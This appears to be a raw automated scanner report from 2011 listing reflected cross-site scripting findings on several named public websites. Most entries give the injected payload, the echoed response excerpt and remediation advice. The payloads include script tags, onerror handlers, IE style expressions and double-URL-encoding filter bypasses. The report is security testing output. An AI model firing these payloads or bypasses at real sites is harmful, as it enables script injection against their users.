Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c03a8"><script>alert(1)</script>c3c94a296fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 458c0'a%3d'b'4d608cb70ba was submitted in the REST URL parameter 1. This input was echoed as 458c0'a='b'4d608cb70ba in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2534<img%20src%3da%20onerror%3dalert(1)>37bac4424e8 was submitted in the REST URL parameter 1. This input was echoed as d2534<img src=a onerror=alert(1)>37bac4424e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
HTTP/1.1 200 OK Date: Thu, 31 Mar 2011 20:16:05 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=2E9FDB931F9B6388A0C7CAAC94BB4C2B; Domain=.gather.com; Path=/ Set-Cookie: vis=HdkU8Hbs5hVHjy83U0WCj9VGT69anurplgmT88MsvzJmo10NLnFruY71+tQe++OV1dSVwln4y+rMysAb/tHSXjQkh06aFmEiWWtZ2tFz9WU=; Domain=gather.com; Expires=Wed, 26-Mar-2031 20:16:05 GMT; Path=/ P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT" Set-Cookie: vis=VXl8U+/+uLjaIQOofjluHpYUf7slxcvwMQUvAbTFwVWvH1vlzmhLTQ4JX2/DYNAh/PDi8iZy201gdHx/+MlBWEc6TVjrfEoNDT8iC3OTKHDhp5A2eWAH5qtL+lsfjkIZ; Domain=gather.com; Expires=Wed, 26-Mar-2031 20:16:05 GMT; Path=/ P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT" Content-Length: 17544 Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46cf4"><a>f6e771fb85b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Thu, 31 Mar 2011 20:15:47 GMT Server: Apache/2.2.15 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=11CBF94ACC4AE7E65E1C4A80E106B29B; Domain=.gather.com; Path=/ Set-Cookie: vis=IQEE2srEKXa7NIKTUcORrOUj7hWAro2sGoX+WTfIfx9z48PQx/dnfCx/jFJ1YkriqWn6kqfjRS9ZYk8SSfkIh/+Cq7DpbNRKce0obUmjiNg=; Domain=gather.com; Expires=Wed, 26-Mar-2031 20:15:47 GMT; Path=/ P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT" Set-Cookie: vis=CbQ2sV5k921W3oerMNOFf5YUf7slxcvw/6LJ3a72UYFqB5zXunhsOH3jBkWIAmPPr2nN88tvgFf57wOJd0hurgUMKy/C08uq57pV6xba8OePrfbi7B6t42HYXo/XC829; Domain=gather.com; Expires=Wed, 26-Mar-2031 20:15:47 GMT; Path=/ P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT" Content-Length: 17459 Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da0bd"><script>alert(1)</script>315a16ef299 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe436"-alert(1)-"585424767da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96e5b"><img%20src%3da%20onerror%3dalert(1)>12e6ef332ea was submitted in the REST URL parameter 1. This input was echoed as 96e5b"><img src=a onerror=alert(1)>12e6ef332ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 404 Not Found Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Server: nginx/0.7.65 Vary: Accept-Encoding Date: Thu, 31 Mar 2011 21:17:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41129
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31abe"><script>alert(1)</script>178f2c2e0b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79fd0"%3b8fb452cbcec was submitted in the REST URL parameter 1. This input was echoed as 79fd0";8fb452cbcec in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: Apache P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Content-Type: text/html;charset=UTF-8 Date: Thu, 31 Mar 2011 20:22:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 51644
<!-- URI: /favicon.ico79fd0";8fb452cbcecservletName: defaultstatusCode: 404 --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> < ...[SNIP]... cadc=0;var erpm=0; /*var unicaEvents = new Array(); var unicaEventIdx = 0;*/ var g_cfn="generalhealth"; var g_cfn_bold = "generalhealth"; var g_encoded_uri = encodeURI("/favicon.ico79fd0";8fb452cbcec"); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb99a%2522%253balert%25281%2529%252f%252f03025ba1a26 was submitted in the REST URL parameter 1. This input was echoed as fb99a";alert(1)//03025ba1a26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e37f8"><script>alert(1)</script>b1d942b5500 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 21:00:28 GMT Server: VoxCAST X-Powered-By: PHP/5.2.11 Content-Type: text/html; charset=UTF-8 X-Cache: MISS from VoxCAST Content-Length: 40001
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h ...[SNIP]... <input type="hidden" name="returl" value="http://www.inc.com/favicon.icoe37f8"><script>alert(1)</script>b1d942b5500"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9d1c6<script>alert(1)</script>b7be8b4f11a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: Resin/3.0.28 P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA Content-Length: 17716 Cache-Control: no-cache X-Cacheable: no-404 Date: Thu, 31 Mar 2011 20:18:02 GMT X-Varnish: 769684798 Age: 0 Via: 1.1 varnish X-Cache-Svr: squid04.instructables.com X-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c ...[SNIP]... <p> We're sorry, the URL http://www.instructables.com/favicon.ico9d1c6<script>alert(1)</script>b7be8b4f11a is either incorrect or no longer available. Maybe you are looking for one of the following Instructables below. </p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 415f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ca9c51b078d was submitted in the REST URL parameter 1. This input was echoed as 415f4"style="x:expression(alert(1))"ca9c51b078d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3a7e</script><script>alert(1)</script>9c95a9e9202 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd1d8"-alert(1)-"9734fb6d31b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 20:46:40 GMT Server: Apache/2.2.3 (Red Hat) P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: country=us; expires=Saturday, 30-Apr-2011 20:46:40 GMT;path=/; domain=.letssingit.com Set-Cookie: language=en; expires=Saturday, 30-Apr-2011 20:46:40 GMT;path=/; domain=.letssingit.com Set-Cookie: session_views=1; path=/; domain=.letssingit.com Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 22648
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE> <META http-equiv="content-type" content="tex ...[SNIP]... <script type="text/javascript">COMSCORE.beacon({c1:2,c2:"6772046",c3:"",c4:"www.letssingit.com/favicon.icofd1d8"-alert(1)-"9734fb6d31b",c5:"",c6:"",c15:""});</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23b93"><script>alert(1)</script>3d2ada0bfcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 20:46:39 GMT Server: Apache/2.2.3 (Red Hat) P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: country=us; expires=Saturday, 30-Apr-2011 20:46:39 GMT;path=/; domain=.letssingit.com Set-Cookie: language=en; expires=Saturday, 30-Apr-2011 20:46:39 GMT;path=/; domain=.letssingit.com Set-Cookie: session_views=1; path=/; domain=.letssingit.com Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 22663
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD> <TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE> <META http-equiv="content-type" content="tex ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.letssingit.com/favicon.ico23b93"><script>alert(1)</script>3d2ada0bfcc&c5=&c6=&c15=&cj=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 865e9"><script>alert(1)</script>7486580f0c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43a0b</script><script>alert(1)</script>053b8181b3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c16"><script>alert(1)</script>ab163775080 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 912d0"><script>alert(1)</script>2b43f02c700 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e93d7<script>alert(1)</script>f43fd169a2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6db86"><script>alert(1)</script>8ee9b35128d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico6db86"><script>alert(1)</script>8ee9b35128d at Thu Mar 31 20:06:25 2011 +0000 from 173.193.214.243"> ...[SNIP]...
1.77. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28af8"><script>alert(1)</script>20b7a85cc1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico?28af8"><script>alert(1)</script>20b7a85cc1d=1 at Thu Mar 31 20:06:24 2011 +0000 from 173.193.214.243"> ...[SNIP]...
1.78. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bd9eb<script>alert(1)</script>76a74a9ba72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f12b"><script>alert(1)</script>8202a0642d4 was submitted in the REST URL parameter 1. This input was echoed as 7f12b\"><script>alert(1)</script>8202a0642d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42e91"><a%20b%3dc>acd858b3881 was submitted in the REST URL parameter 1. This input was echoed as 42e91"><a b=c>acd858b3881 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5074a"><script>alert(1)</script>0868326e682 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77908"><script>alert(1)</script>f5f1cf68a57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95621</script><script>alert(1)</script>c7269d76e3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3337a"><script>alert(1)</script>b4d26af53b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f569e<script>alert(1)</script>62a34c3c606 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 20:51:46 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 5934 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><TITLE>404 Page Not Fou ...[SNIP]... <h1>The page /favicon.icof569e<script>alert(1)</script>62a34c3c606 not found!</h1> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29072</script><script>alert(1)</script>d9a3c1f9652 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73daa"><a>7dd5ddc4d44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2267'%3b18c314fa453 was submitted in the REST URL parameter 1. This input was echoed as f2267';18c314fa453 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a805e<script>alert(1)</script>a14fd80a43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd33a'%3balert(1)//53648ea2dc8 was submitted in the REST URL parameter 1. This input was echoed as cd33a';alert(1)//53648ea2dc8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dca48"-alert(1)-"68a04308ce8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9f94"><script>alert(1)</script>5e88123921 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3233e'style%3d'x%3aexpression(alert(1))'945f7f3be7c was submitted in the REST URL parameter 1. This input was echoed as 3233e'style='x:expression(alert(1))'945f7f3be7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec574"><script>alert(1)</script>bb8cab8ea5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <a href="http://www.pissedconsumer.com/favicon.icoec574"><script>alert(1)</script>bb8cab8ea5b#comments-section"> ...[SNIP]...
1.95. http://www.pissedconsumer.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pissedconsumer.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e736"><script>alert(1)</script>e19151622c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e52e'><script>alert(1)</script>470e1531952 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e71'%3b29ab7550b80 was submitted in the REST URL parameter 1. This input was echoed as 42e71';29ab7550b80 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca11%2522%253e%253ca%2520b%253dc%253ecba81895b5 was submitted in the REST URL parameter 1. This input was echoed as fca11"><a b=c>cba81895b5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f6f7'-alert(1)-'96b9f092301 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<title> Page Not Found | The Responsibility Project by Liberty Mutual </title>
<!-- iconography -- ...[SNIP]... <![[CDATA
var thisPageURL = escape('http://www.responsibilityproject.com/1f6f7'-alert(1)-'96b9f092301'); var thisPageTitle = escape('Page Not Found'); var thisContentID = escape(''); var thisURI = escape('/1f6f7'-alert(1)-'96b9f092301'); var content_section_a = '';
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e712f"><script>alert(1)</script>ecf8024d0d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db5c6<img%20src%3da%20onerror%3dalert(1)>dd7dbbc5fa4 was submitted in the REST URL parameter 1. This input was echoed as db5c6<img src=a onerror=alert(1)>dd7dbbc5fa4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6ddc7<script>alert(1)</script>ae658d7d145 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 21:05:09 GMT Server: Apache/2.2.8 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html Content-Length: 291
<html><body><b>The page you requested:<br/><i>www.schoolfusion.us/favicon.ico6ddc7<script>alert(1)</script>ae658d7d145</i><br/> does not exist on www.schoolfusion.us<br />Please click <a href='http:// ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 30a56<a>43abf53a120 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
